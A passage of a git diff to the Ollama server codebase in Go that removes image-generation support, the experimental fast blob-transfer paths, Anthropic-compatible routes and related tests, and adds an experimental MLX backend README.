-		t.Fatalf("URL() error: %v", err)
-	}
-
-	if u.Host != "auth.example.com" {
-		t.Errorf("host = %q, want %q", u.Host, "auth.example.com")
-	}
-	if u.Path != "/token" {
-		t.Errorf("path = %q, want %q", u.Path, "/token")
-	}
-
-	q := u.Query()
-	if q.Get("service") != "registry" {
-		t.Errorf("service = %q, want %q", q.Get("service"), "registry")
-	}
-	if scopes := q["scope"]; len(scopes) != 2 {
-		t.Errorf("scope count = %d, want 2", len(scopes))
-	}
-	if q.Get("ts") == "" {
-		t.Error("missing ts")
-	}
-	if q.Get("nonce") == "" {
-		t.Error("missing nonce")
-	}
-
-	// Nonces should differ between calls
-	u2, _ := challenge.URL()
-	if q.Get("nonce") == u2.Query().Get("nonce") {
-		t.Error("nonce should be unique per call")
-	}
-}
-
-func TestRegistryChallengeURLInvalid(t *testing.T) {
-	challenge := registryChallenge{Realm: "://invalid"}
-	if _, err := challenge.URL(); err == nil {
-		t.Error("expected error for invalid URL")
-	}
-}
--- a/server/images.go
+++ b/server/images.go
@@ -30,7 +30,6 @@ import (
 	"github.com/ollama/ollama/thinking"
 	"github.com/ollama/ollama/types/model"
 	"github.com/ollama/ollama/version"
-	"github.com/ollama/ollama/x/imagegen/transfer"
 )

 var (
@@ -41,7 +40,6 @@ var (
 	errCapabilityVision     = errors.New("vision")
 	errCapabilityEmbedding  = errors.New("embedding")
 	errCapabilityThinking   = errors.New("thinking")
-	errCapabilityImage      = errors.New("image generation")
 	errInsecureProtocol     = errors.New("insecure protocol http")
 )

@@ -75,11 +73,6 @@ type Model struct {
 func (m *Model) Capabilities() []model.Capability {
 	capabilities := []model.Capability{}

-	// Check for image generation model via config capabilities
-	if slices.Contains(m.Config.Capabilities, "image") {
-		return []model.Capability{model.CapabilityImage}
-	}
-
 	// Check for completion capability
 	if m.ModelPath != "" {
 		f, err := gguf.Open(m.ModelPath)
@@ -160,7 +153,6 @@ func (m *Model) CheckCapabilities(want ...model.Capability) error {
 		model.CapabilityVision:     errCapabilityVision,
 		model.CapabilityEmbedding:  errCapabilityEmbedding,
 		model.CapabilityThinking:   errCapabilityThinking,
-		model.CapabilityImage:      errCapabilityImage,
 	}

 	for _, cap := range want {
@@ -563,24 +555,6 @@ func PushModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		layers = append(layers, manifest.Config)
 	}

-	// Use fast transfer for models with tensor layers (many small blobs)
-	if hasTensorLayers(layers) {
-		// Read raw manifest JSON to preserve tensor metadata fields
-		manifestPath, err := mp.GetManifestPath()
-		if err != nil {
-			return err
-		}
-		manifestJSON, err := os.ReadFile(manifestPath)
-		if err != nil {
-			return err
-		}
-		if err := pushWithTransfer(ctx, mp, layers, manifestJSON, regOpts, fn); err != nil {
-			return err
-		}
-		fn(api.ProgressResponse{Status: "success"})
-		return nil
-	}
-
 	for _, layer := range layers {
 		if err := uploadBlob(ctx, mp, layer, regOpts, fn); err != nil {
 			slog.Info(fmt.Sprintf("error uploading blob: %v", err))
@@ -646,15 +620,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		layers = append(layers, manifest.Config)
 	}

-	// Use fast transfer for models with tensor layers (many small blobs)
-	if hasTensorLayers(layers) {
-		if err := pullWithTransfer(ctx, mp, layers, manifest, regOpts, fn); err != nil {
-			return err
-		}
-		fn(api.ProgressResponse{Status: "success"})
-		return nil
-	}
-
 	skipVerify := make(map[string]bool)
 	for _, layer := range layers {
 		cacheHit, err := downloadBlob(ctx, downloadOpts{
@@ -669,6 +634,7 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		skipVerify[layer.Digest] = cacheHit
 		delete(deleteMap, layer.Digest)
 	}
+	delete(deleteMap, manifest.Config.Digest)

 	fn(api.ProgressResponse{Status: "verifying sha256 digest"})
 	for _, layer := range layers {
@@ -677,11 +643,13 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		}
 		if err := verifyBlob(layer.Digest); err != nil {
 			if errors.Is(err, errDigestMismatch) {
+				// something went wrong, delete the blob
 				fp, err := GetBlobsPath(layer.Digest)
 				if err != nil {
 					return err
 				}
 				if err := os.Remove(fp); err != nil {
+					// log this, but return the original error
 					slog.Info(fmt.Sprintf("couldn't remove file with digest mismatch '%s': %v", fp, err))
 				}
 			}
@@ -689,11 +657,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		}
 	}

-	for _, layer := range layers {
-		delete(deleteMap, layer.Digest)
-	}
-	delete(deleteMap, manifest.Config.Digest)
-
 	fn(api.ProgressResponse{Status: "writing manifest"})

 	manifestJSON, err := json.Marshal(manifest)
@@ -727,148 +690,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 	return nil
 }

-// hasTensorLayers checks if any layer has tensor media type.
-func hasTensorLayers(layers []Layer) bool {
-	for _, layer := range layers {
-		if layer.MediaType == MediaTypeImageTensor {
-			return true
-		}
-	}
-	return false
-}
-
-// pullWithTransfer uses the simplified x/transfer package for downloading blobs.
-func pullWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifest *Manifest, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
-	blobs := make([]transfer.Blob, len(layers))
-	for i, layer := range layers {
-		blobs[i] = transfer.Blob{
-			Digest: layer.Digest,
-			Size:   layer.Size,
-		}
-	}
-
-	destDir, err := GetBlobsPath("")
-	if err != nil {
-		return err
-	}
-
-	base := mp.BaseURL()
-	if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
-		base.Scheme = "http"
-	}
-	baseURL := base.String()
-
-	var totalSize int64
-	for _, blob := range blobs {
-		totalSize += blob.Size
-	}
-
-	progress := func(completed, total int64) {
-		fn(api.ProgressResponse{
-			Status:    "pulling model",
-			Digest:    "sha256:model",
-			Total:     total,
-			Completed: completed,
-		})
-	}
-
-	getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
-		return getAuthorizationToken(ctx, registryChallenge{
-			Realm:   challenge.Realm,
-			Service: challenge.Service,
-			Scope:   challenge.Scope,
-		}, base.Host)
-	}
-
-	if err := transfer.Download(ctx, transfer.DownloadOptions{
-		Blobs:      blobs,
-		BaseURL:    baseURL,
-		DestDir:    destDir,
-		Repository: mp.GetNamespaceRepository(),
-		Progress:   progress,
-		Token:      regOpts.Token,
-		GetToken:   getToken,
-		Logger:     slog.Default(),
-	}); err != nil {
-		return err
-	}
-
-	// Write manifest
-	fn(api.ProgressResponse{Status: "writing manifest"})
-	manifestJSON, err := json.Marshal(manifest)
-	if err != nil {
-		return err
-	}
-
-	fp, err := mp.GetManifestPath()
-	if err != nil {
-		return err
-	}
-	if err := os.MkdirAll(filepath.Dir(fp), 0o755); err != nil {
-		return err
-	}
-
-	return os.WriteFile(fp, manifestJSON, 0o644)
-}
-
-// pushWithTransfer uses the simplified x/transfer package for uploading blobs and manifest.
-func pushWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifestJSON []byte, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
-	blobs := make([]transfer.Blob, len(layers))
-	for i, layer := range layers {
-		blobs[i] = transfer.Blob{
-			Digest: layer.Digest,
-			Size:   layer.Size,
-			From:   layer.From,
-		}
-	}
-
-	srcDir, err := GetBlobsPath("")
-	if err != nil {
-		return err
-	}
-
-	base := mp.BaseURL()
-	if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
-		base.Scheme = "http"
-	}
-	baseURL := base.String()
-
-	var totalSize int64
-	for _, blob := range blobs {
-		totalSize += blob.Size
-	}
-
-	progress := func(completed, total int64) {
-		fn(api.ProgressResponse{
-			Status:    "pushing model",
-			Digest:    "sha256:model",
-			Total:     total,
-			Completed: completed,
-		})
-	}
-
-	getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
-		return getAuthorizationToken(ctx, registryChallenge{
-			Realm:   challenge.Realm,
-			Service: challenge.Service,
-			Scope:   challenge.Scope,
-		}, base.Host)
-	}
-
-	return transfer.Upload(ctx, transfer.UploadOptions{
-		Blobs:       blobs,
-		BaseURL:     baseURL,
-		SrcDir:      srcDir,
-		Progress:    progress,
-		Token:       regOpts.Token,
-		GetToken:    getToken,
-		Logger:      slog.Default(),
-		Manifest:    manifestJSON,
-		ManifestRef: mp.Tag,
-		Repository:  mp.GetNamespaceRepository(),
-	})
-}
-
 func pullModelManifest(ctx context.Context, mp ModelPath, regOpts *registryOptions) (*Manifest, error) {
 	requestURL := mp.BaseURL().JoinPath("v2", mp.GetNamespaceRepository(), "manifests", mp.Tag)

@@ -918,7 +739,7 @@ func makeRequestWithRetry(ctx context.Context, method string, requestURL *url.UR

 			// Handle authentication error with one retry
 			challenge := parseRegistryChallenge(resp.Header.Get("www-authenticate"))
-			token, err := getAuthorizationToken(ctx, challenge, requestURL.Host)
+			token, err := getAuthorizationToken(ctx, challenge)
 			if err != nil {
 				return nil, err
 			}
--- a/server/images_test.go
+++ b/server/images_test.go
@@ -47,15 +47,6 @@ func TestModelCapabilities(t *testing.T) {
 		model        Model
 		expectedCaps []model.Capability
 	}{
-		{
-			name: "model with image generation capability via config",
-			model: Model{
-				Config: model.ConfigV2{
-					Capabilities: []string{"image"},
-				},
-			},
-			expectedCaps: []model.Capability{model.CapabilityImage},
-		},
 		{
 			name: "model with completion capability",
 			model: Model{
@@ -242,24 +233,6 @@ func TestModelCheckCapabilities(t *testing.T) {
 			checkCaps:      []model.Capability{"unknown"},
 			expectedErrMsg: "unknown capability",
 		},
-		{
-			name: "model missing image generation capability",
-			model: Model{
-				ModelPath: completionModelPath,
-				Template:  chatTemplate,
-			},
-			checkCaps:      []model.Capability{model.CapabilityImage},
-			expectedErrMsg: "does not support image generation",
-		},
-		{
-			name: "model with image generation capability",
-			model: Model{
-				Config: model.ConfigV2{
-					Capabilities: []string{"image"},
-				},
-			},
-			checkCaps: []model.Capability{model.CapabilityImage},
-		},
 	}

 	for _, tt := range tests {
--- a/server/layer.go
+++ b/server/layer.go
@@ -13,14 +13,9 @@ type Layer struct {
 	Digest    string `json:"digest"`
 	Size      int64  `json:"size"`
 	From      string `json:"from,omitempty"`
-	Name      string `json:"name,omitempty"` // tensor name, e.g., "text_encoder/model.embed_tokens.weight"
 	status    string
 }

-const (
-	MediaTypeImageTensor = "application/vnd.ollama.image.tensor"
-)
-
 func NewLayer(r io.Reader, mediatype string) (Layer, error) {
 	blobs, err := GetBlobsPath("")
 	if err != nil {
--- a/server/manifest.go
+++ b/server/manifest.go
@@ -47,37 +47,13 @@ func (m *Manifest) Remove() error {
 }

 func (m *Manifest) RemoveLayers() error {
-	ms, err := Manifests(true)
-	if err != nil {
-		return err
-	}
-
-	// Build set of digests still in use by other manifests
-	inUse := make(map[string]struct{})
-	for _, other := range ms {
-		for _, layer := range append(other.Layers, other.Config) {
-			if layer.Digest != "" {
-				inUse[layer.Digest] = struct{}{}
-			}
-		}
-	}
-
-	// Remove layers not used by any other manifest
 	for _, layer := range append(m.Layers, m.Config) {
-		if layer.Digest == "" {
-			continue
-		}
-		if _, used := inUse[layer.Digest]; used {
-			continue
-		}
-		blob, err := GetBlobsPath(layer.Digest)
-		if err != nil {
-			return err
-		}
-		if err := os.Remove(blob); errors.Is(err, os.ErrNotExist) {
-			slog.Debug("layer does not exist", "digest", layer.Digest)
-		} else if err != nil {
-			return err
+		if layer.Digest != "" {
+			if err := layer.Remove(); errors.Is(err, os.ErrNotExist) {
+				slog.Debug("layer does not exist", "digest", layer.Digest)
+			} else if err != nil {
+				return err
+			}
 		}
 	}

--- a/server/routes.go
+++ b/server/routes.go
@@ -50,8 +50,6 @@ import (
 	"github.com/ollama/ollama/types/errtypes"
 	"github.com/ollama/ollama/types/model"
 	"github.com/ollama/ollama/version"
-	"github.com/ollama/ollama/x/imagegen"
-	xserver "github.com/ollama/ollama/x/server"
 )

 const signinURLStr = "https://ollama.com/connect?name=%s&key=%s"
@@ -315,7 +313,7 @@ func (s *Server) GenerateHandler(c *gin.Context) {
 		return
 	}

-	// expire the runner if unload is requested (empty prompt, keep alive is 0)
+	// expire the runner
 	if req.Prompt == "" && req.KeepAlive != nil && req.KeepAlive.Duration == 0 {
 		s.sched.expireRunner(m)

@@ -329,12 +327,6 @@ func (s *Server) GenerateHandler(c *gin.Context) {
 		return
 	}

-	// Handle image generation models
-	if slices.Contains(m.Capabilities(), model.CapabilityImage) {
-		s.handleImageGenerate(c, req, name.String(), checkpointStart)
-		return
-	}
-
 	if req.Raw && (req.Template != "" || req.System != "" || len(req.Context) > 0) {
 		c.AbortWithStatusJSON(http.StatusBadRequest, gin.H{"error": "raw mode does not support template, system, or context"})
 		return
@@ -1101,31 +1093,6 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
 		QuantizationLevel: m.Config.FileType,
 	}

-	// For image generation models, populate details from imagegen package
-	if slices.Contains(m.Capabilities(), model.CapabilityImage) {
-		if info, err := imagegen.GetModelInfo(name.String()); err == nil {
-			modelDetails.Family = info.Architecture
-			modelDetails.ParameterSize = format.HumanNumber(uint64(info.ParameterCount))
-			modelDetails.QuantizationLevel = info.Quantization
-		}
-	}
-
-	// For safetensors LLM models (experimental), populate details from config.json
-	if m.Config.ModelFormat == "safetensors" && slices.Contains(m.Config.Capabilities, "completion") {
-		if info, err := xserver.GetSafetensorsLLMInfo(name.String()); err == nil {
-			if arch, ok := info["general.architecture"].(string); ok && arch != "" {
-				modelDetails.Family = arch
-			}
-			if paramCount, ok := info["general.parameter_count"].(int64); ok && paramCount > 0 {
-				modelDetails.ParameterSize = format.HumanNumber(uint64(paramCount))
-			}
-		}
-		// Get torch_dtype directly from config.json for quantization level
-		if dtype, err := xserver.GetSafetensorsDtype(name.String()); err == nil && dtype != "" {
-			modelDetails.QuantizationLevel = dtype
-		}
-	}
-
 	if req.System != "" {
 		m.System = req.System
 	}
@@ -1208,30 +1175,6 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
 		return resp, nil
 	}

-	if slices.Contains(m.Capabilities(), model.CapabilityImage) {
-		// Populate tensor info if verbose
-		if req.Verbose {
-			if tensors, err := xserver.GetSafetensorsTensorInfo(name.String()); err == nil {
-				resp.Tensors = tensors
-			}
-		}
-		return resp, nil
-	}
-
-	// For safetensors LLM models (experimental), populate ModelInfo from config.json
-	if m.Config.ModelFormat == "safetensors" && slices.Contains(m.Config.Capabilities, "completion") {
-		if info, err := xserver.GetSafetensorsLLMInfo(name.String()); err == nil {
-			resp.ModelInfo = info
-		}
-		// Populate tensor info if verbose
-		if req.Verbose {
-			if tensors, err := xserver.GetSafetensorsTensorInfo(name.String()); err == nil {
-				resp.Tensors = tensors
-			}
-		}
-		return resp, nil
-	}
-
 	kvData, tensors, err := getModelData(m.ModelPath, req.Verbose)
 	if err != nil {
 		return nil, err
@@ -1600,11 +1543,6 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
 	r.GET("/v1/models", middleware.ListMiddleware(), s.ListHandler)
 	r.GET("/v1/models/:model", middleware.RetrieveMiddleware(), s.ShowHandler)
 	r.POST("/v1/responses", middleware.ResponsesMiddleware(), s.ChatHandler)
-	// OpenAI-compatible image generation endpoint
-	r.POST("/v1/images/generations", middleware.ImageGenerationsMiddleware(), s.GenerateHandler)
-
-	// Inference (Anthropic compatibility)
-	r.POST("/v1/messages", middleware.AnthropicMessagesMiddleware(), s.ChatHandler)

 	if rc != nil {
 		// wrap old with new
@@ -2084,14 +2022,8 @@ func (s *Server) ChatHandler(c *gin.Context) {
 		}
 	} else {
 		if req.Think != nil && req.Think.Bool() {
-			// Set think to nil when being used with Anthropic API to connect to tools like claude code
-			if _, ok := c.Get("relax_thinking"); ok {
-				slog.Warn("model does not support thinking, relaxing thinking to nil", "model", req.Model)
-				req.Think = nil
-			} else {
-				c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support thinking", req.Model)})
-				return
-			}
+			c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support thinking", req.Model)})
+			return
 		}
 	}

@@ -2472,91 +2404,3 @@ func filterThinkTags(msgs []api.Message, m *Model) []api.Message {
 	}
 	return msgs
 }
-
-// handleImageGenerate handles image generation requests within GenerateHandler.
-// This is called when the model has the Image capability.
-func (s *Server) handleImageGenerate(c *gin.Context, req api.GenerateRequest, modelName string, checkpointStart time.Time) {
-	// Validate image dimensions
-	const maxDimension int32 = 4096
-	if req.Width > maxDimension || req.Height > maxDimension {
-		c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("width and height must be <= %d", maxDimension)})
-		return
-	}
-
-	// Schedule the runner for image generation
-	runner, _, _, err := s.scheduleRunner(c.Request.Context(), modelName, []model.Capability{model.CapabilityImage}, nil, req.KeepAlive)
-	if err != nil {
-		handleScheduleError(c, req.Model, err)
-		return
-	}
-
-	checkpointLoaded := time.Now()
-
-	// Handle load-only request (empty prompt)
-	if req.Prompt == "" {
-		c.JSON(http.StatusOK, api.GenerateResponse{
-			Model:      req.Model,
-			CreatedAt:  time.Now().UTC(),
-			Done:       true,
-			DoneReason: "load",
-		})
-		return
-	}
-
-	// Set headers for streaming response
-	c.Header("Content-Type", "application/x-ndjson")
-
-	// Get seed from options if provided
-	var seed int64
-	if s, ok := req.Options["seed"]; ok {
-		switch v := s.(type) {
-		case int:
-			seed = int64(v)
-		case int64:
-			seed = v
-		case float64:
-			seed = int64(v)
-		}
-	}
-
-	var streamStarted bool
-	if err := runner.Completion(c.Request.Context(), llm.CompletionRequest{
-		Prompt: req.Prompt,
-		Width:  req.Width,
-		Height: req.Height,
-		Steps:  req.Steps,
-		Seed:   seed,
-	}, func(cr llm.CompletionResponse) {
-		streamStarted = true
-		res := api.GenerateResponse{
-			Model:     req.Model,
-			CreatedAt: time.Now().UTC(),
-			Done:      cr.Done,
-		}
-
-		if cr.TotalSteps > 0 {
-			res.Completed = int64(cr.Step)
-			res.Total = int64(cr.TotalSteps)
-		}
-
-		if cr.Image != "" {
-			res.Image = cr.Image
-		}
-
-		if cr.Done {
-			res.DoneReason = cr.DoneReason.String()
-			res.Metrics.TotalDuration = time.Since(checkpointStart)
-			res.Metrics.LoadDuration = checkpointLoaded.Sub(checkpointStart)
-		}
-
-		data, _ := json.Marshal(res)
-		c.Writer.Write(append(data, '\n'))
-		c.Writer.Flush()
-	}); err != nil {
-		// Only send JSON error if streaming hasn't started yet
-		// (once streaming starts, headers are committed and we can't change status code)
-		if !streamStarted {
-			c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
-		}
-	}
-}
--- a/server/routes_generate_test.go
+++ b/server/routes_generate_test.go
@@ -2101,95 +2101,3 @@ func TestChatWithPromptEndingInThinkTag(t *testing.T) {
 		}
 	})
 }
-
-func TestGenerateUnload(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	var loadFnCalled bool
-
-	s := Server{
-		sched: &Scheduler{
-			pendingReqCh:    make(chan *LlmRequest, 1),
-			finishedReqCh:   make(chan *LlmRequest, 1),
-			expiredCh:       make(chan *runnerRef, 1),
-			unloadedCh:      make(chan any, 1),
-			loaded:          make(map[string]*runnerRef),
-			newServerFn:     newMockServer(&mockRunner{}),
-			getGpuFn:        getGpuFn,
-			getSystemInfoFn: getSystemInfoFn,
-			loadFn: func(req *LlmRequest, _ *ggml.GGML, _ ml.SystemInfo, _ []ml.DeviceInfo, _ bool) bool {
-				loadFnCalled = true
-				req.successCh <- &runnerRef{llama: &mockRunner{}}
-				return false
-			},
-		},
-	}
-
-	go s.sched.Run(t.Context())
-
-	_, digest := createBinFile(t, ggml.KV{
-		"general.architecture":          "llama",
-		"llama.block_count":             uint32(1),
-		"llama.context_length":          uint32(8192),
-		"llama.embedding_length":        uint32(4096),
-		"llama.attention.head_count":    uint32(32),
-		"llama.attention.head_count_kv": uint32(8),
-		"tokenizer.ggml.tokens":         []string{""},
-		"tokenizer.ggml.scores":         []float32{0},
-		"tokenizer.ggml.token_type":     []int32{0},
-	}, []*ggml.Tensor{
-		{Name: "token_embd.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_norm.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_down.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_gate.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_up.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_norm.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_k.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_output.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_q.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_v.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "output.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-	})
-
-	w := createRequest(t, s.CreateHandler, api.CreateRequest{
-		Model:  "test",
-		Files:  map[string]string{"file.gguf": digest},
-		Stream: &stream,
-	})
-
-	if w.Code != http.StatusOK {
-		t.Fatalf("expected status 200, got %d", w.Code)
-	}
-
-	t.Run("unload with empty prompt and keepalive 0", func(t *testing.T) {
-		loadFnCalled = false
-
-		w := createRequest(t, s.GenerateHandler, api.GenerateRequest{
-			Model:     "test",
-			Prompt:    "",
-			KeepAlive: &api.Duration{Duration: 0},
-			Stream:    &stream,
-		})
-
-		if w.Code != http.StatusOK {
-			t.Errorf("expected status 200, got %d", w.Code)
-		}
-
-		var resp api.GenerateResponse
-		if err := json.Unmarshal(w.Body.Bytes(), &resp); err != nil {
-			t.Fatalf("failed to unmarshal response: %v", err)
-		}
-
-		if resp.DoneReason != "unload" {
-			t.Errorf("expected done_reason 'unload', got %q", resp.DoneReason)
-		}
-
-		if !resp.Done {
-			t.Error("expected done to be true")
-		}
-
-		if loadFnCalled {
-			t.Error("expected model NOT to be loaded for unload request, but loadFn was called")
-		}
-	})
-}
--- a/server/sched.go
+++ b/server/sched.go
@@ -21,7 +21,6 @@ import (
 	"github.com/ollama/ollama/logutil"
 	"github.com/ollama/ollama/ml"
 	"github.com/ollama/ollama/types/model"
-	"github.com/ollama/ollama/x/imagegen"
 )

 type LlmRequest struct {
@@ -195,14 +194,6 @@ func (s *Scheduler) processPending(ctx context.Context) {
 						slog.Debug("updating default concurrency", "OLLAMA_MAX_LOADED_MODELS", maxRunners, "gpu_count", len(gpus))
 					}

-					// Check for image generation model before attempting GGML load
-					if slices.Contains(pending.model.Config.Capabilities, "image") {
-						if s.loadImageGen(pending) {
-							break
-						}
-						continue
-					}
-
 					// Load model for fitting
 					logutil.Trace("loading model metadata", "model", pending.model.ModelPath)
 					ggml, err := llm.LoadModel(pending.model.ModelPath, 1024)
@@ -552,49 +543,6 @@ iGPUScan:
 	return false
 }

-// loadImageGen loads an image generation model.
-func (s *Scheduler) loadImageGen(req *LlmRequest) bool {
-	// Use model name for imagegen (it resolves manifests by name, not file path)
-	modelName := req.model.ShortName
-	server, err := imagegen.NewServer(modelName)
-	if err != nil {
-		req.errCh <- err
-		return true
-	}
-
-	sessionDuration := envconfig.KeepAlive()
-	if req.sessionDuration != nil {
-		sessionDuration = req.sessionDuration.Duration
-	}
-
-	runner := &runnerRef{
-		model:           req.model,
-		modelPath:       req.model.ModelPath,
-		llama:           server,
-		Options:         &req.opts,
-		loading:         false,
-		sessionDuration: sessionDuration,
-		totalSize:       server.TotalSize(),
-		vramSize:        server.VRAMSize(),
-	}
-
-	s.loadedMu.Lock()
-	s.loaded[req.model.ModelPath] = runner
-	s.loadedMu.Unlock()
-
-	// Set up expiration timer
-	runner.refMu.Lock()
-	if sessionDuration > 0 {
-		runner.expireTimer = time.AfterFunc(sessionDuration, func() {
-			s.expiredCh <- runner
-		})
-	}
-	runner.refMu.Unlock()
-
-	req.useLoadedRunner(runner, s.finishedReqCh)
-	return true
-}
-
 func (s *Scheduler) updateFreeSpace(allGpus []ml.DeviceInfo) {
 	if len(allGpus) == 0 {
 		return
--- a/server/sched_test.go
+++ b/server/sched_test.go
@@ -804,93 +804,3 @@ func (s *mockLlm) GetPort() int                                       { return -
 func (s *mockLlm) GetDeviceInfos(ctx context.Context) []ml.DeviceInfo { return nil }
 func (s *mockLlm) HasExited() bool                                    { return false }
 func (s *mockLlm) GetActiveDeviceIDs() []ml.DeviceID                  { return nil }
-
-// TestImageGenRunnerCanBeEvicted verifies that an image generation model
-// loaded in the scheduler can be evicted when idle.
-func TestImageGenRunnerCanBeEvicted(t *testing.T) {
-	ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
-	defer done()
-
-	s := InitScheduler(ctx)
-	s.getGpuFn = getGpuFn
-	s.getSystemInfoFn = getSystemInfoFn
-
-	// Simulate an image gen runner already loaded
-	imageGenRunner := &runnerRef{
-		model:           &Model{Name: "z-image", ModelPath: "/fake/image/model"},
-		modelPath:       "/fake/image/model",
-		llama:           &mockLlm{vramSize: 21 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{}},
-		sessionDuration: 5 * time.Millisecond,
-		refCount:        0, // idle
-	}
-
-	s.loadedMu.Lock()
-	s.loaded["/fake/image/model"] = imageGenRunner
-	s.loadedMu.Unlock()
-
-	// Verify the image gen runner is loaded
-	s.loadedMu.Lock()
-	require.Len(t, s.loaded, 1)
-	s.loadedMu.Unlock()
-
-	// findRunnerToUnload should find the idle image gen runner
-	runner := s.findRunnerToUnload()
-	require.NotNil(t, runner)
-	require.Equal(t, "/fake/image/model", runner.modelPath)
-}
-
-// TestImageGenSchedulerCoexistence verifies that image generation models
-// can coexist with language models in the scheduler and VRAM is tracked correctly.
-func TestImageGenSchedulerCoexistence(t *testing.T) {
-	ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
-	defer done()
-
-	s := InitScheduler(ctx)
-	s.getGpuFn = getGpuFn
-	s.getSystemInfoFn = getSystemInfoFn
-
-	// Load both an imagegen runner and a language model runner
-	imageGenRunner := &runnerRef{
-		model:           &Model{Name: "flux", ModelPath: "/fake/flux/model"},
-		modelPath:       "/fake/flux/model",
-		llama:           &mockLlm{vramSize: 8 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{{Library: "Metal"}: 8 * format.GigaByte}},
-		sessionDuration: 10 * time.Millisecond,
-		numParallel:     1,
-		refCount:        0,
-	}
-
-	langModelRunner := &runnerRef{
-		model:           &Model{Name: "llama3", ModelPath: "/fake/llama3/model"},
-		modelPath:       "/fake/llama3/model",
-		llama:           &mockLlm{vramSize: 4 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{{Library: "Metal"}: 4 * format.GigaByte}},
-		sessionDuration: 10 * time.Millisecond,
-		numParallel:     1,
-		refCount:        0,
-	}
-
-	s.loadedMu.Lock()
-	s.loaded["/fake/flux/model"] = imageGenRunner
-	s.loaded["/fake/llama3/model"] = langModelRunner
-	s.loadedMu.Unlock()
-
-	// Verify both are loaded
-	s.loadedMu.Lock()
-	require.Len(t, s.loaded, 2)
-	require.NotNil(t, s.loaded["/fake/flux/model"])
-	require.NotNil(t, s.loaded["/fake/llama3/model"])
-	s.loadedMu.Unlock()
-
-	// Verify updateFreeSpace accounts for both
-	gpus := []ml.DeviceInfo{
-		{
-			DeviceID:    ml.DeviceID{Library: "Metal"},
-			TotalMemory: 24 * format.GigaByte,
-			FreeMemory:  24 * format.GigaByte,
-		},
-	}
-	s.updateFreeSpace(gpus)
-
-	// Free memory should be reduced by both models
-	expectedFree := uint64(24*format.GigaByte) - uint64(8*format.GigaByte) - uint64(4*format.GigaByte)
-	require.Equal(t, expectedFree, gpus[0].FreeMemory)
-}
--- a/server/upload.go
+++ b/server/upload.go
@@ -279,7 +279,7 @@ func (b *blobUpload) uploadPart(ctx context.Context, method string, requestURL *
 	case resp.StatusCode == http.StatusUnauthorized:
 		w.Rollback()
 		challenge := parseRegistryChallenge(resp.Header.Get("www-authenticate"))
-		token, err := getAuthorizationToken(ctx, challenge, requestURL.Host)
+		token, err := getAuthorizationToken(ctx, challenge)
 		if err != nil {
 			return err
 		}
--- a/types/model/capability.go
+++ b/types/model/capability.go
@@ -3,13 +3,12 @@ package model
 type Capability string

 const (
-	CapabilityCompletion      = Capability("completion")
-	CapabilityTools           = Capability("tools")
-	CapabilityInsert          = Capability("insert")
-	CapabilityVision          = Capability("vision")
-	CapabilityEmbedding       = Capability("embedding")
-	CapabilityThinking        = Capability("thinking")
-	CapabilityImage = Capability("image")
+	CapabilityCompletion = Capability("completion")
+	CapabilityTools      = Capability("tools")
+	CapabilityInsert     = Capability("insert")
+	CapabilityVision     = Capability("vision")
+	CapabilityEmbedding  = Capability("embedding")
+	CapabilityThinking   = Capability("thinking")
 )

 func (c Capability) String() string {
--- a/x/README.md
+++ b/x/README.md
@@ -0,0 +1,24 @@
+# Experimental Features 
+
+## MLX Backend
+
+We're working on a new experimental backend based on the [MLX project](https://github.com/ml-explore/mlx)
+
+Support is currently limited to MacOS and Linux with CUDA GPUs.  We're looking to add support for Windows CUDA soon, and other GPU vendors.  To build:
+
+```
+cmake --preset MLX
+cmake --build --preset MLX --parallel
+cmake --install --component MLX
+go build -tags mlx .
+```
+
+On linux, use the preset "MLX CUDA 13" or "MLX CUDA 12" to enable CUDA with the default Ollama NVIDIA GPU architectures enabled. 
+
+## Image Generation
+
